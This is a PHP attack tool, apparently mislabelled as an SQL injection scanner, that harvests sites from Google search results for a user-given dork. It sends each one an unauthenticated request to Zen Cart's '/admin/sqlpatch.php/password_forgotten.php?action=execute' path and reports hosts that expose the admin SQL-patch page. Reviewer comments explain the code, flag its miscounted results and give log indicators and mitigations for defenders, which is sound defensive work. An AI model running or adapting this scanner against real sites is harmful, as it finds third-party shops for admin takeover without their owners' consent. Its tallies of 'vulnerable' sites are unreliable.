- <?php
- /**
- * SQL Injection Scanner
- * PHP Version By XShimeX
- * Version 1.0
- * Thanks To: TBDSecurity.Com, HMSecurity.org, All my friends, And ALLAH.
- *
- * Reviewer notes on what the code below actually does:
- * - Despite the title, no SQL injection test is performed. The script takes a
- *   search query from the command line, scrapes result links from search
- *   result pages, and requests one fixed admin path on every link found.
- * - A host is reported when the response contains any string listed in $bug.
- *   The request carries no cookies or credentials, so a match means that page
- *   was served without a login.
- * - The reported numbers are unreliable: the counters are updated once per
- *   string in $bug, not once per site, and failed fetches are silently
- *   counted as "not vulnerable".
- * - For defenders: look in web server access logs for request paths containing
- *   "/admin/sqlpatch.php/password_forgotten.php". PHP's HTTP stream wrapper
- *   sends no User-Agent header unless the user_agent ini setting is set, so
- *   such requests may arrive with an empty User-Agent (confirm per log source).
- * - Mitigation is on the shop side: run a Zen Cart release in which this path
- *   requires authentication (affected versions are not stated in this
- *   listing) and restrict the admin directory, e.g. rename it or put an IP
- *   allow-list or HTTP authentication in front of it.
- */
- set_time_limit(0); // lift PHP's execution time limit for the whole run
- $vuln = 0; // number of banner-string matches
- $not_vuln = 0; // number of banner-string non-matches
- $total = 0; // number of banner-string checks performed
- print "[+] SQL Injection Scanner PHP Version\n";
- print "[+] Version 1.0 By XShimeX\n";
- if(!$argv[1]) { // no query argument given: print usage and stop
- print "[%] Usage: $argv[0] <dork>\n";
- print "[%] Example : $argv[0] inurl:news.php?id=\n";
- exit;
- }
- /**
- * SQL Bug(syntax error) takes from here: http://www.darkc0de.com/others/devilzc0de.py
- *
- * NOTE(review): the entries below are not SQL syntax errors. They read like
- * the warning text of Zen Cart's admin SQL patch page (confirm against a
- * Zen Cart install), so they work as a fingerprint of that page, not as a
- * sign of injectable SQL.
- */
- $bug = array(
- 'If you are installing 3rd-party contributions, note that you do so at your own risk',
- 'BE SURE TO DO A FULL DATABASE BACKUP BEFORE RUNNING SCRIPTS HERE',
- 'Zen Cart™ makes no warranty as to the safety of scripts supplied by 3rd-party contributors. Test before using on your live database',
- 'NOTE: Zen Cart database-upgrade scripts should NOT be run from this page',
- 'Please upload the new zc_install folder and run the upgrade from there instead for better reliability'
- );
- print "[@] Start Finding Links...\n";
- for($i = 0; $i <= 900; $i += 10) { // result offsets 0, 10, ... 900
- $fp = @file_get_contents("http://www.google.com/search?q=$argv[1]&num=10&hl=en&as_qdr=all&start=$i&sa=N"); // @ hides fetch failures
- @preg_match_all("/<h3 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $fp, $links); // group 2 is the href of each matched heading link
- $url[] = $links[2]; // one list of hrefs per result page
- }
- print "[@] Done Finding Links...\n";
- print "[@] Now searching for Vulnerable\n";
- foreach($url as $key) { // $key is the href list of one result page
- foreach($key as $value) { // $value is a single scraped href
- $fp = @file_get_contents($value."/admin/sqlpatch.php/password_forgotten.php?action=execute"); // plain GET, no session; failures are suppressed
- foreach($bug as $error) { // every banner string is tried, with no early exit
- if(@preg_match("/$error/", $fp)) { // the banner string is used as the regex pattern
- print "[#] zen cart error: $value'\n"; // the same host can be printed once per matching string
- $vuln++;
- } else {
- $not_vuln++;
- }
- $total++; // counts checks, not sites
- }
- }
- }
- print "[@] Done Scanning\n";
- print "[%] Result\n";
- print "[-] Total Vulnerable: $vuln\n"; // matches, not distinct hosts
- print "[-] Total Not Vulnerable : $not_vuln\n"; // non-matches, including unreachable hosts
- print "[-] Total scanned Website: $total\n"; // checks performed, not websites
- print "Enjoy :)\n";
- ?>